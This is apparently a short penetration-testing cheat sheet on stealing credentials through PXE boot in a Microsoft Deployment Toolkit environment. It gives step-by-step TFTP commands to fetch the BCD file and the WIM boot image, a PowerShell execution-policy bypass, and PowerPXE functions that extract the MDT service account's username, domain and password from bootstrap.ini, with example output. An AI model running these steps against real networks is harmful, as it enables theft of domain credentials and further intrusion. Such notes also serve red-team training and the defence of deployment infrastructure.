PXE Boot
We can Request the PXE Boot Configure Details from DHCP which is a BCD File. These files store the Information relevant to PXE Boots for different types of Architecture.
:: This File is usually Requested through DHCP
x64{39...28}.bcd
Reading The Image
Using TFTP to downloading the BCD File to Read the Configuration of the MDT Server. The BCD files are always located in the /Tmp/ Directory on the MDT Server.
tftp -i <IP> GET "\Tmp\x64{39...28}.bcd" conf.bcd
Extracting PXE Boot Image Location
We need the Powershell Script PowerPXE to accomplish this Task. We can use the Get-WimFile Function of PowerPXE to Recover the Locations of the PXE Boot Images from the BCD File.
- PowerPXE
- Output
# Sets Execution Policies for Windows Computers
# [Bypass] Nothing is Blocked and there are no Warnings or Prompts
Set-ExecutionPolicy Bypass -Scope process -Force
# Import the Powershell Script
Import-Module .\PowerPXE.ps1
# Recover the Pxe Boot Image [Location]
$BCDFile = "conf.bcd"
Get-WimFile -bcdFile $BCDFile
>> Parse the BCD file: conf.bcd
>>>> Identify wim file : <PXE Boot Image Location>
<PXE Boot Image Location>
Recovering Credentials
Windows Imaging Format (WIM) are Bootable Images. Now that we have the location of the PXE Boot Image, we can use TFTP to Download this Image.
:: The Location can be Shown from the Output of [Get-WimFile]
tftp -i <IP> GET "<PXE Boot Image Location>" pxeboot.wim
This can also be done Manually by Extracting the Image and looking for the bootstrap.ini
We can use PowerPXE to Recover the Credentials.
- Get-FindCredentials
- Output
Get-FindCredentials -WimFile pxeboot.wim
>> Open pxeboot.wim
>>>> Finding Bootstrap.ini
>>>> >>>> DeployRoot = \\DOMAIN\MTDBuildLab$
>>>> >>>> UserID = svcMDT
>>>> >>>> UserDomain = ZA
>>>> >>>> UserPassword = Password